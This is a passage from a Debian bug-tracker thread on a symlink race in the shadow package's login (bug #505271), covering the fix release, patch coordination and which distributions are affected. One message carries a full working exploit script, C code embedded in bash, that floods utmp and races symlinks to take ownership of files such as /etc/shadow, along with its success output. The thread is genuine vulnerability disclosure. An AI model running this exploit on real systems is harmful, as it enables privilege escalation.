  to pool/main/s/shadow/login_4.1.1-6_i386.deb
passwd_4.1.1-6_i386.deb
  to pool/main/s/shadow/passwd_4.1.1-6_i386.deb
shadow_4.1.1-6.diff.gz
  to pool/main/s/shadow/shadow_4.1.1-6.diff.gz
shadow_4.1.1-6.dsc
  to pool/main/s/shadow/shadow_4.1.1-6.dsc



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 505271@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net> (supplier of updated shadow package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Fri, 14 Nov 2008 21:52:42 +0100
Source: shadow
Binary: passwd login
Architecture: source i386
Version: 1:4.1.1-6
Distribution: unstable
Urgency: medium
Maintainer: Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>
Changed-By: Nicolas FRANCOIS (Nekral) <nicolas.francois@centraliens.net>
Description: 
 login      - system login tools
 passwd     - change and administer password and group data
Closes: 501353 501830 505271
Changes: 
 shadow (1:4.1.1-6) unstable; urgency=medium
 .
   * The "Rollot" release.
   * debian/patches/303_login_symlink_attack: Fix a race condition that could
     lead to gaining ownership or changing mode of arbitrary files.
     Closes: #505271
   * debian/patches/304_su.1_synopsis: Fix the su synopsis. username is
     referenced in the manpage, not LOGIN. Closes: #501830
   * debian/patches/305_login.1_japanese: Fix the path of the utmp and wtmp
     files. Closes: #501353
Checksums-Sha1: 
 46f1e4d4d5283ddfb51d21295cd6d2bcdca817b8 1542 shadow_4.1.1-6.dsc
 8109d3127e691320ea0aac8d10bb8049e5bc2c26 91634 shadow_4.1.1-6.diff.gz
 890ce81171530f32965468c5f1cbb79caca08bd2 872410 passwd_4.1.1-6_i386.deb
 a2b45f1143f7d633108fe433f619c274cbddc278 854400 login_4.1.1-6_i386.deb
Checksums-Sha256: 
 7d3ad5d9a3e64c02786ec7df4482d7ffea30fa2cb9e19b9440979d2c825018af 1542 shadow_4.1.1-6.dsc
 8a77b2133fc99b1a9abb6a8d9b536dfc2b17755e136e107a52da9d35ddcc1b43 91634 shadow_4.1.1-6.diff.gz
 e8dc15387131c94d34f99ec0a0aaed871a7ef35d297e2606d519d375332d5123 872410 passwd_4.1.1-6_i386.deb
 83d14bd3f071865e69d5a15deef310743fd7d8ae038e504c52833a7226dc7fdb 854400 login_4.1.1-6_i386.deb
Files: 
 86093dda25aa7f6eb4f7bc344d3efd3b 1542 admin required shadow_4.1.1-6.dsc
 c973ab4886b7286556fdb0a482970f3f 91634 admin required shadow_4.1.1-6.diff.gz
 dfefabce28e0634d5cb2f6a9e50f1932 872410 admin required passwd_4.1.1-6_i386.deb
 6485bc7dbdf8bc6b5dbce1c0fcc96c8e 854400 admin required login_4.1.1-6_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkoROkACgkQWgo5mup89a0lXwCfXfCwKBULRrrXfR6LafqG14Lw
0JcAnidFkWTmd8YgzUbpdXTqinbVDDKu
=t/G0
-----END PGP SIGNATURE-----





Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sat, 22 Nov 2008 20:06:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sat, 22 Nov 2008 20:06:03 GMT) Full text and rfc822 format available.

Message #100 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505271@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Re: Bug#505271 closed ... fixed in shadow 1:4.1.1-6
Date: Sun, 23 Nov 2008 07:02:28 +1100
Please fix for etch also. Please issue DSA.
Please alert other Linux distros, they are also affected.

Since you claim this issue is fixed, surely (?!) there is no harm
in making the exploit public. Should (may) I do that now?

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sun, 23 Nov 2008 05:57:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 23 Nov 2008 05:57:07 GMT) Full text and rfc822 format available.

Message #105 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505071@bugs.debian.org, 505271@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Bug#505071 and Bug#505271 comments
Date: Sun, 23 Nov 2008 16:56:17 +1100
Random comments about bugs 505071 and 505271.

Group utmp was introduced so terminal emulators could be setgid instead
of needing setuid root, to prevent bugs in them to escalate to root
access. Terminal emulators are generally not written with security in
mind, being the "more features the better" type of programs. This bug
negates the benefit of the group utmp separation. Any data controllable
by group utmp should be treated as insecure or possibly hostile.

Seems that login attempts to pick the "right" line of the utmp file.
Funny idea, seeing how pututline will whack the entry "anywhere"
(depending on ut_id which are rather arbitrary and irrelevant).

If login wanted to sanitize left-over utmp entries, then should set what
ttyname thinks is the correct ut_line (and what it thinks is a sensible
ut_id), not perpetuate "wrong" settings.

Privileged programs should not attempt to clean up utmp, root can do
that at his leisure e.g. with "echo -n '' > /var/run/utmp".

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sun, 23 Nov 2008 20:51:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Moritz Muehlenhoff <jmm@inutil.org>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 23 Nov 2008 20:51:07 GMT) Full text and rfc822 format available.

Message #110 received at 505271@bugs.debian.org (full text, mbox):

From: Moritz Muehlenhoff <jmm@inutil.org>
To: Paul Szabo <psz@maths.usyd.edu.au>
Cc: jmm@inutil.org, 505271@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Sun, 23 Nov 2008 21:46:59 +0100
On Sat, Nov 22, 2008 at 10:03:39PM +1100, Paul Szabo wrote:
> Dear Moritz,
> 
> Yes, Nicolas's patch does fix the problem. But please note:
> (1) It is my patch, not Nicolas's, was first proposed in
>     http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=505071#15
> (2) There is no such patch, nobody has made a "diff" file,
>     much less a compiled/built package to try.

Nicolas, can you prepare an upload for Lenny?

Cheers,
        Moritz




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sun, 23 Nov 2008 21:06:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 23 Nov 2008 21:06:02 GMT) Full text and rfc822 format available.

Message #115 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: jmm@inutil.org
Cc: 505271@bugs.debian.org, nicolas.francois@centraliens.net
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 24 Nov 2008 08:01:42 +1100
Dear Moritz,

Seems your message relates to "old" things, Nicolas has fixed this for
lenny already.

Please also:
 - fix for etch,
 - alert other Linux distros,
 - issue DSA.

Thanks,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sun, 23 Nov 2008 21:27:01 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 23 Nov 2008 21:27:02 GMT) Full text and rfc822 format available.

Message #120 received at 505271@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: psz@maths.usyd.edu.au
Cc: jmm@inutil.org, 505271@bugs.debian.org
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Sun, 23 Nov 2008 22:24:26 +0100
[Message part 1 (text/plain, inline)]
Hello,

On Mon, Nov 24, 2008 at 08:01:42AM +1100, psz@maths.usyd.edu.au wrote:
> 
> Seems your message relates to "old" things, Nicolas has fixed this for
> lenny already.

I've made an upload to fix #505271, but not this bug (#505071).
The answer on debian-release was not enough for me to also fix #505071.

> Please also:
>  - fix for etch,

I made an upload for Etch (-7etch1, also to fix #505271)
Moritz, if you can't see it, maybe I did it wrong.

>  - alert other Linux distros,

A new upstream version was released this weekend.

It also contains a fix for this bug (#505071).
I attach this patch in case it is considered OK and needed for Lenny.

>  - issue DSA.

This will be done by the Security Team when the Etch package will be ready
on all archs.

Best Regards,
-- 
Nekral
[shadow_505071.diff (text/x-diff, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sun, 23 Nov 2008 21:33:08 GMT) Full text and rfc822 format available.

Acknowledgement sent to Moritz Muehlenhoff <jmm@inutil.org>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 23 Nov 2008 21:33:11 GMT) Full text and rfc822 format available.

Message #125 received at 505271@bugs.debian.org (full text, mbox):

From: Moritz Muehlenhoff <jmm@inutil.org>
To: Nicolas François <nicolas.francois@centraliens.net>
Cc: psz@maths.usyd.edu.au, jmm@inutil.org, 505271@bugs.debian.org
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Sun, 23 Nov 2008 22:29:55 +0100
On Sun, Nov 23, 2008 at 10:24:26PM +0100, Nicolas François wrote:
> Hello,
> 
> On Mon, Nov 24, 2008 at 08:01:42AM +1100, psz@maths.usyd.edu.au wrote:
> > 
> > Seems your message relates to "old" things, Nicolas has fixed this for
> > lenny already.
> 
> I've made an upload to fix #505271, but not this bug (#505071).
> The answer on debian-release was not enough for me to also fix #505071.
> 
> > Please also:
> >  - fix for etch,
> 
> I made an upload for Etch (-7etch1, also to fix #505271)
> Moritz, if you can't see it, maybe I did it wrong.

I don't see any trace of it on klecker? Can you please send the debdiff
to team@security.debian.org?

Cheers,
        Moritz







Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Mon, 24 Nov 2008 00:18:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 24 Nov 2008 00:18:03 GMT) Full text and rfc822 format available.

Message #130 received at 505271@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: team@security.debian.org
Cc: 505271@bugs.debian.org
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 24 Nov 2008 01:15:14 +0100
[Message part 1 (text/plain, inline)]
On Sun, Nov 23, 2008 at 10:29:55PM +0100, jmm@inutil.org wrote:
> On Sun, Nov 23, 2008 at 10:24:26PM +0100, Nicolas François wrote:
> > 
> > I made an upload for Etch (-7etch1, also to fix #505271)
> > Moritz, if you can't see it, maybe I did it wrong.
> 
> I don't see any trace of it on klecker? Can you please send the debdiff
> to team@security.debian.org?

Here it is.

dupload --to anonymous-security shadow_4.0.18.1-7etch1_i386.changes
is still in my history, and I don't think I interrupted it.

I did not prepare anything for oldstable, but the same patch should still
apply if needed.

Best Regards,
-- 
Nekral
[4.0.18.1-7etch1.debdiff (text/plain, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Thu, 27 Nov 2008 09:18:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Thu, 27 Nov 2008 09:18:05 GMT) Full text and rfc822 format available.

Message #135 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505271@bugs.debian.org, jmm@inutil.org, nicolas.francois@centraliens.net, team@security.debian.org
Subject: Re: Bug#505271 closed ... fixed in shadow 1:4.1.1-6
Date: Thu, 27 Nov 2008 20:13:49 +1100
Dear Nicolas and Moritz,

How long do you expect it will take to "in fact" fix this bug (which is
closed, pretend-fixed, still set to just "serious" severity)? Would it
cause problems if I posted the exploit on Monday 1 Dec?

Thanks, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sun, 30 Nov 2008 19:33:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 30 Nov 2008 19:33:04 GMT) Full text and rfc822 format available.

Message #140 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505271@bugs.debian.org, jmm@inutil.org, nicolas.francois@centraliens.net, team@security.debian.org
Subject: Bug#505271 exploit
Date: Mon, 1 Dec 2008 06:29:25 +1100
I asked a few days ago:
> Would it cause problems if I posted the exploit ...?
and did not receive a reply, so I assume it is acceptable
to post a trivial exploit for a "done" bug.

Cheers, Paul

---

#!/bin/bash -

echo '
	#include <string.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <utmp.h>
	#include <sys/types.h>
	#include <stdio.h>

	int main(int argc, char *argv[])
	{
	  struct utmp entry;
	  int i;

	  entry.ut_type=LOGIN_PROCESS;
	  strcpy(entry.ut_line,"/tmp/x");
	  entry.ut_time=0;
	  strcpy(entry.ut_user,"badguy");
	  strcpy(entry.ut_host,"badhost");
	  entry.ut_addr=0;
	  for(i=1;i<9;i++) {
	    entry.ut_pid=(pid_t)( i + (int)getpid() );
	    sprintf(entry.ut_id,"bad%d",i);
	    pututline(&entry);
	  }
	}
' > /tmp/fillutmp.c

cc -o /tmp/fillutmp /tmp/fillutmp.c

echo 'Ask someone with group utmp privileges to do:'
echo '  chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'
echo -n 'Press [RETURN] to continue... '
read ANS

echo '
	#include <unistd.h>

	int main(int argc, char *argv[])
	{
	  while(1)
	  {
	    unlink("/tmp/x");
	    symlink(argv[1],"/tmp/x");
	    unlink("/tmp/x");
	    symlink(argv[2],"/tmp/x");
	  }
	}
' > /tmp/jigglelnk.c

cc -o /tmp/jigglelnk /tmp/jigglelnk.c

HOST=`hostname` # or simply localhost?
echo "Which tty do you think a 'telnet $HOST' will use next?"
echo "(Do that telnet and see...)"
read TTY
echo "You said it will be '$TTY' ..."

ATK=/etc/debian_version # should be /etc/shadow

echo "Starting symlink re-jiggler ..."
/tmp/jigglelnk $TTY $ATK &
JIG=$!

LOOP=0
while :; do
  ((LOOP = $LOOP + 1))
  echo; echo; echo "Try = $LOOP"

  /tmp/fillutmp

  echo "Telnetting... if login succeeds, just exit for next try..."
  /usr/bin/telnet $HOST

  LS=`ls -ld $ATK`
  case "$LS" in
    *root*root* ) ;; # not done yet...
    * )
      echo; echo
      echo "Success after $LOOP tries!"
      echo "$LS"
      echo; echo
      break
    ;;
  esac
done

kill $JIG
rm /tmp/fillutmp /tmp/jigglelnk /tmp/x

# ...
# ~$ logout
# Connection closed by foreign host.
# Success after 12 tries!
# -rw------- 1 psz tty 4 Oct 28  2006 /etc/debian_version




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sun, 07 Dec 2008 21:21:10 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 07 Dec 2008 21:21:10 GMT) Full text and rfc822 format available.

Message #145 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: nicolas.francois@centraliens.net
Cc: 505271@bugs.debian.org, jmm@inutil.org
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 8 Dec 2008 08:20:36 +1100
Dear Nicolas,

On 23 Nov you wrote:

>>  - alert other Linux distros,
> A new upstream version was released this weekend.

Have not seen any distros make announcements. What distros use that? 
(Am surprised that even Ubuntu has not updated, though normally they
seem responsive.)

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sun, 07 Dec 2008 21:48:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 07 Dec 2008 21:48:08 GMT) Full text and rfc822 format available.

Message #150 received at 505271@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: psz@maths.usyd.edu.au
Cc: 505271@bugs.debian.org, jmm@inutil.org
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Sun, 7 Dec 2008 22:47:15 +0100
On Mon, Dec 08, 2008 at 08:20:36AM +1100, psz@maths.usyd.edu.au wrote:
> Dear Nicolas,
> 
> On 23 Nov you wrote:
> 
> >>  - alert other Linux distros,
> > A new upstream version was released this weekend.
> 
> Have not seen any distros make announcements. What distros use that? 
> (Am surprised that even Ubuntu has not updated, though normally they
> seem responsive.)

The bug should affect ubuntu and probably gentoo (4.1.2.2 already
packaged). Not RedHat / Mandrake.
I don't know about other distros. I don't know if ubuntu supervises the
bug tagged 'security', and I don't know their milestones.

Best Regards,
-- 
Nekral




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Sun, 07 Dec 2008 22:42:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Sun, 07 Dec 2008 22:42:02 GMT) Full text and rfc822 format available.

Message #155 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: nicolas.francois@centraliens.net
Cc: 505271@bugs.debian.org, jmm@inutil.org
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 8 Dec 2008 09:37:42 +1100
> The bug should affect ubuntu and probably gentoo (4.1.2.2 already
> packaged). Not RedHat / Mandrake.

A quick peek into shadow-utils-4.1.2-8.fc10.src.rpm suggests Fedora is
also affected. I do not know about RHEL.

Ubuntu now notified directly:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/306082

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Mon, 08 Dec 2008 01:33:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 08 Dec 2008 01:33:02 GMT) Full text and rfc822 format available.

Message #160 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: nicolas.francois@centraliens.net
Cc: 505271@bugs.debian.org, jmm@inutil.org
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 8 Dec 2008 12:32:01 +1100
I wrote a little while ago:

> A quick peek into shadow-utils-4.1.2-8.fc10.src.rpm suggests Fedora is
> also affected. I do not know about RHEL.

A quick peek into shadow-utils-4.0.17-14.el5.src.rpm suggests RHEL is
just as bad.

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Mon, 08 Dec 2008 10:27:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nicolas François <nicolas.francois@centraliens.net>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 08 Dec 2008 10:27:05 GMT) Full text and rfc822 format available.

Message #165 received at 505271@bugs.debian.org (full text, mbox):

From: Nicolas François <nicolas.francois@centraliens.net>
To: psz@maths.usyd.edu.au
Cc: 505271@bugs.debian.org
Subject: Re: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 8 Dec 2008 11:22:34 +0100
On Mon, Dec 08, 2008 at 09:37:42AM +1100, psz@maths.usyd.edu.au wrote:
> > The bug should affect ubuntu and probably gentoo (4.1.2.2 already
> > packaged). Not RedHat / Mandrake.
> 
> A quick peek into shadow-utils-4.1.2-8.fc10.src.rpm suggests Fedora is
> also affected. I do not know about RHEL.

shadow-utils.spec:rm $RPM_BUILD_ROOT/%{_bindir}/login

makes me think Fedora / RHEL should be free of login's bugs.

-- 
Nekral




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Mon, 08 Dec 2008 12:57:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Karel Zak <kzak@redhat.com>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 08 Dec 2008 12:57:05 GMT) Full text and rfc822 format available.

Message #170 received at 505271@bugs.debian.org (full text, mbox):

From: Karel Zak <kzak@redhat.com>
To: Nicolas François <nicolas.francois@centraliens.net>, 505271@bugs.debian.org
Cc: psz@maths.usyd.edu.au
Subject: Re: [Pkg-shadow-devel] Bug#505271: Bug#505071: login tty mis-determination (see bug#332198)
Date: Mon, 8 Dec 2008 13:52:59 +0100
On Mon, Dec 08, 2008 at 11:22:34AM +0100, Nicolas François wrote:
> On Mon, Dec 08, 2008 at 09:37:42AM +1100, psz@maths.usyd.edu.au wrote:
> > > The bug should affect ubuntu and probably gentoo (4.1.2.2 already
> > > packaged). Not RedHat / Mandrake.
> > 
> > A quick peek into shadow-utils-4.1.2-8.fc10.src.rpm suggests Fedora is
> > also affected. I do not know about RHEL.
> 
> shadow-utils.spec:rm $RPM_BUILD_ROOT/%{_bindir}/login
> 
> makes me think Fedora / RHEL should be free of login's bugs.

 yes, we use the classic login(1) from util-linux(-ng).

    Karel

-- 
 Karel Zak  <kzak@redhat.com>




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Thu, 18 Dec 2008 05:51:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Thu, 18 Dec 2008 05:51:02 GMT) Full text and rfc822 format available.

Message #175 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505271@bugs.debian.org
Subject: login tty mis-determination (see bug#332198)
Date: Thu, 18 Dec 2008 16:46:19 +1100
For the record: Ubuntu have fixed the problem, see
  http://www.ubuntu.com/usn/usn-695-1

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Thu, 18 Dec 2008 20:03:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Thu, 18 Dec 2008 20:03:03 GMT) Full text and rfc822 format available.

Message #180 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 505271@bugs.debian.org
Subject: login tty mis-determination (see bug#332198)
Date: Fri, 19 Dec 2008 07:00:16 +1100
Pity the fix did not make it into
  http://release.debian.org/stable/4.0/4.0r6/

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Wed, 14 Jan 2009 12:48:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Thijs Kinkhorst <thijs@debian.org>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Wed, 14 Jan 2009 12:48:06 GMT) Full text and rfc822 format available.

Message #185 received at 505271@bugs.debian.org (full text, mbox):

From: Thijs Kinkhorst <thijs@debian.org>
To: Paul Szabo <psz@maths.usyd.edu.au>
Cc: 505271@bugs.debian.org, nicolas.francois@centraliens.net, team@security.debian.org
Subject: Re: Bug#505271 closed ... fixed in shadow 1:4.1.1-6
Date: Wed, 14 Jan 2009 13:45:11 +0100
[Message part 1 (text/plain, inline)]
Hi Paul,

On Thursday 27 November 2008 10:13, Paul Szabo wrote:
> How long do you expect it will take to "in fact" fix this bug (which is
> closed, pretend-fixed, still set to just "serious" severity)? Would it
> cause problems if I posted the exploit on Monday 1 Dec?

Sorry for the delay incurred in fixing this in Debian stable. An update is now 
in preparation and will be released shortly. Thank you for reporting the 
issue to Debian.


Thijs
[Message part 2 (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Fri, 23 Jan 2009 03:09:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Fri, 23 Jan 2009 03:09:02 GMT) Full text and rfc822 format available.

Message #190 received at 505271@bugs.debian.org (full text, mbox):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: thijs@debian.org
Cc: 505271@bugs.debian.org, nicolas.francois@centraliens.net, team@security.debian.org
Subject: Re: Bug#505271 closed ... fixed in shadow 1:4.1.1-6
Date: Fri, 23 Jan 2009 14:06:31 +1100
Thanks for the DSA-1709 fix.

Belatedly, I realize that this still leaves a DoS attack: fill up utmp
with entries for all possible PIDs, then login will fail. Maybe that is
"properly" Bug#505071 (as distinct from this one)? Please see there
about ideas on how to perform this DoS without access to group utmp.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Information forwarded to debian-bugs-dist@lists.debian.org, Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>:
Bug#505271; Package login. (Mon, 26 Jan 2009 13:39:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Thijs Kinkhorst <thijs@debian.org>:
Extra info received and forwarded to list. Copy sent to Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org>. (Mon, 26 Jan 2009 13:39:03 GMT) Full text and rfc822 format available.

Message #195 received at 505271@bugs.debian.org (full text, mbox):

From: Thijs Kinkhorst <thijs@debian.org>
To: Paul Szabo <psz@maths.usyd.edu.au>
Cc: 505271@bugs.debian.org, nicolas.francois@centraliens.net, team@security.debian.org
Subject: Re: Bug#505271 closed ... fixed in shadow 1:4.1.1-6
Date: Mon, 26 Jan 2009 14:37:52 +0100
[Message part 1 (text/plain, inline)]
On Friday 23 January 2009 04:06, Paul Szabo wrote:
> Belatedly, I realize that this still leaves a DoS attack: fill up utmp
> with entries for all possible PIDs, then login will fail. Maybe that is
> "properly" Bug#505071 (as distinct from this one)? Please see there
> about ideas on how to perform this DoS without access to group utmp.

Although from the description I think it's definately something that's good to 
